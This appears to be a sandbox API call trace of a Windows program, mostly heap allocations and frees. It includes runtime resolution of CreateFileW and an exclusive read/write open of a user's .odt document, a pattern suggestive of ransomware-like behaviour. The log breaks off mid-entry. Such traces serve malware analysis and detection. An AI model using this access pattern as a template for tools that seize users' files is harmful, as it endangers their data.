[0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.041] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.041] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0180.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0180.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0180.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\_--jwxd.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.045] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0180.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) 